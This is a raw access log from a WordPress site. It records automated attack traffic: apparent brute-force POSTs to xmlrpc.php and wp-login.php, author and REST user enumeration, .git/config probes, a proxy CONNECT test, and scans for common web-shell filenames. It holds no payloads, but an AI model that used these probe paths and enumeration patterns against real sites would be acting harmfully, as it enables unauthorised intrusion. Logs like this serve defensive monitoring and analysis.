72.167.250.64 - - [29/Dec/2025:21:51:33 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
72.167.250.64 - - [29/Dec/2025:21:51:34 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
72.167.250.64 - - [29/Dec/2025:21:51:35 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
72.167.250.64 - - [29/Dec/2025:21:51:36 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
72.167.250.64 - - [29/Dec/2025:21:51:37 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
72.167.250.64 - - [29/Dec/2025:21:51:39 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
72.167.250.64 - - [29/Dec/2025:21:51:40 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
72.167.250.64 - - [29/Dec/2025:21:51:41 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
47.242.2.139 - - [29/Dec/2025:21:51:47 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:48 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:49 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:50 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:52 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:53 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:54 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:55 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:57 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
47.242.2.139 - - [29/Dec/2025:21:51:58 +0300] "POST /xmlrpc.php HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
82.148.16.210 - - [29/Dec/2025:21:54:44 +0300] "POST /wp-cron.php?doing_wp_cron=1767034484.2981998920440673828125 HTTP/1.1" 499 0 "-" "WordPress/6.9-RC4-61341; https://891rpm.com"
209.141.40.130 - - [29/Dec/2025:21:54:44 +0300] "GET /wp-login.php HTTP/1.1" 200 11906 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
209.141.40.130 - - [29/Dec/2025:21:54:45 +0300] "POST /wp-login.php HTTP/1.1" 200 12402 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
170.249.163.210 - - [29/Dec/2025:21:55:11 +0300] "POST /xmlrpc.php HTTP/1.1" 200 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
84.38.184.47 - - [29/Dec/2025:22:02:20 +0300] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0"
84.38.184.47 - - [29/Dec/2025:22:02:21 +0300] "GET / HTTP/1.1" 200 41940 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
84.38.184.47 - - [29/Dec/2025:22:02:21 +0300] "GET / HTTP/1.1" 200 41940 "http://891rpm.com" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0"
160.250.187.4 - - [29/Dec/2025:22:03:20 +0300] "GET /wp-login.php HTTP/2.0" 200 3355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
160.250.187.4 - - [29/Dec/2025:22:03:26 +0300] "POST /wp-login.php HTTP/2.0" 200 3500 "https://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
84.38.184.47 - - [29/Dec/2025:22:03:58 +0300] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
84.38.184.47 - - [29/Dec/2025:22:03:58 +0300] "GET / HTTP/1.1" 200 41940 "http://891rpm.com" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
84.38.184.47 - - [29/Dec/2025:22:03:58 +0300] "GET / HTTP/1.1" 200 41940 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
157.245.215.138 - - [29/Dec/2025:22:10:11 +0300] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.161.210.72 - - [29/Dec/2025:22:10:11 +0300] "GET /wp-login.php HTTP/2.0" 200 3355 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASAJS; rv:11.0) like Gecko"
47.161.210.72 - - [29/Dec/2025:22:10:15 +0300] "POST /wp-login.php HTTP/2.0" 200 3500 "https://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASAJS; rv:11.0) like Gecko"
51.89.39.44 - - [29/Dec/2025:22:14:01 +0300] "GET /files.php HTTP/2.0" 404 47053 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
92.204.55.244 - - [29/Dec/2025:22:15:26 +0300] "GET /wp-login.php HTTP/2.0" 200 3355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
92.204.55.244 - - [29/Dec/2025:22:15:28 +0300] "POST /wp-login.php HTTP/2.0" 200 3500 "https://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
82.148.16.210 - - [29/Dec/2025:22:19:55 +0300] "POST /wp-cron.php?doing_wp_cron=1767035995.4745318889617919921875 HTTP/1.1" 499 0 "-" "WordPress/6.9-RC4-61341; https://891rpm.com"
205.185.127.174 - - [29/Dec/2025:22:19:55 +0300] "GET /wp-login.php HTTP/1.1" 200 11906 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36"
205.185.127.174 - - [29/Dec/2025:22:20:39 +0300] "POST /wp-login.php HTTP/1.1" 200 12402 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36"
84.38.184.47 - - [29/Dec/2025:22:27:50 +0300] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
84.38.184.47 - - [29/Dec/2025:22:29:05 +0300] "GET /.git/config HTTP/1.1" 404 9113 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
103.252.91.84 - - [29/Dec/2025:22:29:59 +0300] "CONNECT google.com:443 HTTP/1.1" 405 150 "-" "Go-http-client/1.1"
4.190.186.103 - - [29/Dec/2025:22:36:48 +0300] "GET /0x.php HTTP/1.1" 301 162 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.190.186.103 - - [29/Dec/2025:22:36:49 +0300] "GET /0x.php HTTP/1.1" 404 47066 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.190.186.103 - - [29/Dec/2025:22:36:50 +0300] "GET /1.php HTTP/1.1" 301 162 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.190.186.103 - - [29/Dec/2025:22:36:50 +0300] "GET /1.php HTTP/1.1" 404 47066 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:51 +0300] "GET /wp-login.php HTTP/1.1" 301 162 "https://www.google.com/search?q=wordpress" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:36:51 +0300] "GET /222.php HTTP/1.1" 301 162 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
4.190.186.103 - - [29/Dec/2025:22:36:51 +0300] "GET /222.php HTTP/1.1" 404 47066 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:52 +0300] "GET /wp-login.php HTTP/1.1" 200 3367 "https://www.google.com/search?q=wordpress" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:36:52 +0300] "GET /403.php HTTP/1.1" 301 162 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:52 +0300] "GET /?author=1 HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:36:52 +0300] "GET /403.php HTTP/1.1" 404 47066 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:52 +0300] "GET /?author=1 HTTP/1.1" 301 5 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:36:53 +0300] "GET /404.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:53 +0300] "GET /author/891rpm/ HTTP/1.1" 200 40490 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:36:53 +0300] "GET /404.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:53 +0300] "GET /?author=2 HTTP/1.1" 301 162 "https://www.google.com/search?q=wordpress" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
4.190.186.103 - - [29/Dec/2025:22:36:53 +0300] "GET /abcd.php HTTP/1.1" 301 162 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:54 +0300] "GET /?author=2 HTTP/1.1" 200 7696 "https://www.google.com/search?q=wordpress" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
4.190.186.103 - - [29/Dec/2025:22:36:54 +0300] "GET /abcd.php HTTP/1.1" 404 47066 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:54 +0300] "GET /?author=3 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
160.30.137.9 - - [29/Dec/2025:22:36:54 +0300] "GET /?author=3 HTTP/1.1" 404 9113 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
4.190.186.103 - - [29/Dec/2025:22:36:54 +0300] "GET /admin/upload/mini.php HTTP/1.1" 301 162 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:54 +0300] "GET /?author=4 HTTP/1.1" 301 162 "https://www.bing.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:36:55 +0300] "GET /admin/upload/mini.php HTTP/1.1" 404 47066 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:55 +0300] "GET /?author=4 HTTP/1.1" 404 9113 "https://www.bing.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:36:55 +0300] "GET /?author=5 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:36:55 +0300] "GET /ahax.php HTTP/1.1" 301 162 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:55 +0300] "GET /?author=5 HTTP/1.1" 404 9113 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:36:55 +0300] "GET /ahax.php HTTP/1.1" 404 47066 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:56 +0300] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
4.190.186.103 - - [29/Dec/2025:22:36:56 +0300] "GET /akcc.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:56 +0300] "GET /wp-json/wp/v2/users HTTP/1.1" 200 320 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
160.30.137.9 - - [29/Dec/2025:22:36:56 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
4.190.186.103 - - [29/Dec/2025:22:36:56 +0300] "GET /akcc.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:56 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:36:57 +0300] "GET /alfav4.1-tesla.php HTTP/1.1" 301 162 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:57 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:36:57 +0300] "GET /alfav4.1-tesla.php HTTP/1.1" 404 47066 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:57 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:36:57 +0300] "GET /asasx.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:57 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:36:58 +0300] "GET /asasx.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:58 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:58 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:36:58 +0300] "GET /bb.php HTTP/1.1" 301 162 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:58 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:36:58 +0300] "GET /bb.php HTTP/1.1" 404 47066 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:36:58 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:36:59 +0300] "GET /black.php HTTP/1.1" 301 162 "https://www.google.co.uk/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:59 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
160.30.137.9 - - [29/Dec/2025:22:36:59 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
4.190.186.103 - - [29/Dec/2025:22:36:59 +0300] "GET /black.php HTTP/1.1" 404 47066 "https://www.google.co.uk/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.190.186.103 - - [29/Dec/2025:22:36:59 +0300] "GET /bolt.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:36:59 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
160.30.137.9 - - [29/Dec/2025:22:36:59 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:00 +0300] "GET /bolt.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:00 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:00 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:00 +0300] "GET /buy.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:00 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:00 +0300] "GET /buy.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:00 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
4.190.186.103 - - [29/Dec/2025:22:37:01 +0300] "GET /chosen.php HTTP/1.1" 301 162 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:01 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:01 +0300] "GET /chosen.php HTTP/1.1" 404 47066 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:01 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
